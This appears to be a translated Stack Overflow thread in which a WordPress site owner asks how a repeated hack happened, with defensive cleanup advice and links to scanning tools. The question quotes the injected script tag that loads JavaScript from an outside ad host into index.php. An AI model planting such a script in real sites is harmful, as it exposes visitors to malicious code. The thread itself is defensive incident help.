【问题标题】:Wordpress website hacked AGAINWordpress 网站再次被黑
【发布时间】:2011-12-07 09:39:21
【问题描述】:

网站现在已经被黑客入侵两次了,我一直遇到同样的问题,我必须下载网站并进行查找和替换以修复它,但似乎并没有解决我的问题

这是他们在 wordpress 的 index.php 文件中插入的代码,它的权限设置为 644。

<script language="javascript" src="http://a.doubleadserver.com/?campaignid=135324812&type=tracking"></script>

我认为这可能是 sql 注入,因为所有文件和文件夹都被锁定为正确的权限 644 755 等。

有人可以告诉我一个我可以用来测试的 mac SQL 注入测试工具吗,我已经阅读了另一篇文章并将我所有的 ftp 帐户更改为 sftp 以确保安全,他们还有什么我缺少的吗?

谢谢

【问题讨论】:

  • 您使用的是最新版本的 wordpress 吗?你如何托管这个网站?是在您自己的服务器上还是通过托管公司?
  • 您好,该网站由我们的客户托管在 media Temple 上,我也已更新到 wordpress 的最新版本
  • 您使用的是共享主机还是 vps 主机?还有你正在使用什么插件和扩展功能。
  • vps 托管各种插件会是问题吗?
  • 如果您使用的是最新版本的 Wordpress,请下载新副本并手动删除并完全替换 /wp-admin/ 和 /wp-includes/。一些黑客可能会将脚本潜入那些在 Wordpress 自动更新时未被删除的文件夹中。

标签: javascript wordpress xss


【解决方案1】:

查找和替换并不是解决此问题的好方法,因为很容易错过您不知道要专门查找的内容。恢复一个干净的备份是最好的方法。使用 v 防病毒插件会有所帮助。最后的手段是通过 xml export 导出您的内容并重新开始。 . .

专业提示:

在不应该出现的地方寻找 PHP 文件,例如在 uploads 文件夹中应该只有 index.php 文件夹,并且应该只有“// Silence is golden”c 消息。如果那里有任何其他 PHP 文件。 . .

祝你好运!

【讨论】:

    【解决方案2】:

    这里有很多可用的工具,分为 2 个部分;在线和下载: http://www.malwarehelp.org/freeware-open-source-commercial-website-security-tools-services-downloads.html

    你也可以在你的 mac 上使用这个,但它需要基本的 Perl 安装。 http://www.cirt.net/nikto2

    【讨论】:

      猜你喜欢
      • 1970-01-01
      • 1970-01-01
      • 2015-12-06
      • 2020-01-30
      • 2015-12-23
      • 2023-03-30
      • 1970-01-01
      • 1970-01-01
      • 1970-01-01
      相关资源
      最近更新 更多